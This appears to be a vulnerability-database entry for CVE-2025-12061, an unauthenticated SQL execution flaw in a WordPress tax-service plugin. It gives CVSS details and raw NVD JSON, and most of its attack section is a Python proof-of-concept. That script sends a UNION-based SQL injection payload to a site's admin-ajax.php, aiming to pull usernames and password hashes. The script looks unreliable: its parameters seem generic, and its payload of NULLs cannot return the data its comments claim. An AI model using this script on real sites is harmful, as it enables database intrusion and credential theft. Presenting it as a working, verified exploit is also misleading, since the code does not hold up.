CVE-2025-12061

Description

The TAX SERVICE Electronic HDM WordPress plugin before 1.2.1 does not authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

TAX SERVICE Electronic HDM WordPress插件 < 1.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12061 PoC - Unauthenticated SQL Injection
# Affects: TAX SERVICE Electronic HDM WordPress Plugin < 1.2.1

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress.com"

# Target the AJAX endpoint
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# SQL Injection payload - Example using UNION-based injection
# This extracts the WordPress database user and password hash
payload = {
    "action": "hdmi_import_data",  # Vulnerable action
    "import_type": "union",
    "table_name": "users",
    "columns": "user_login,user_pass,user_email",
    "where_clause": "1=1 UNION ALL SELECT NULL,NULL,NULL--"
}

print(f"[*] Sending SQL Injection request to {ajax_endpoint}")
print(f"[*] Target: {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.post(ajax_endpoint, data=payload, timeout=10)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Body:\n{response.text[:500]}")
    
    if response.status_code == 200 and ("user" in response.text.lower() or "select" in response.text.lower()):
        print("[+] Potential vulnerability confirmed - SQL injection may be possible")
    else:
        print("[-] No obvious SQL injection detected")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: Modify payload based on target configuration
# Common SQL injection techniques:
# 1. UNION-based injection: Extract data from other tables
# 2. Boolean-based blind: Confirm vulnerability via true/false responses
# 3. Time-based blind: Use SLEEP() to confirm via response delay

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12061
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12061
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12061/
[4] VulDB https://vuldb.com/cve/CVE-2025-12061
[5] https://wpscan.com/vulnerability/1015dd69-faa5-4008-8884-f497ff980ed3/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12061", "sourceIdentifier": "[email protected]", "published": "2025-11-26T06:15:44.223", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TAX SERVICE Electronic HDM WordPress plugin before 1.2.1 does not authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wpscan.com/vulnerability/1015dd69-faa5-4008-8884-f497ff980ed3/", "source": "[email protected]"}]}}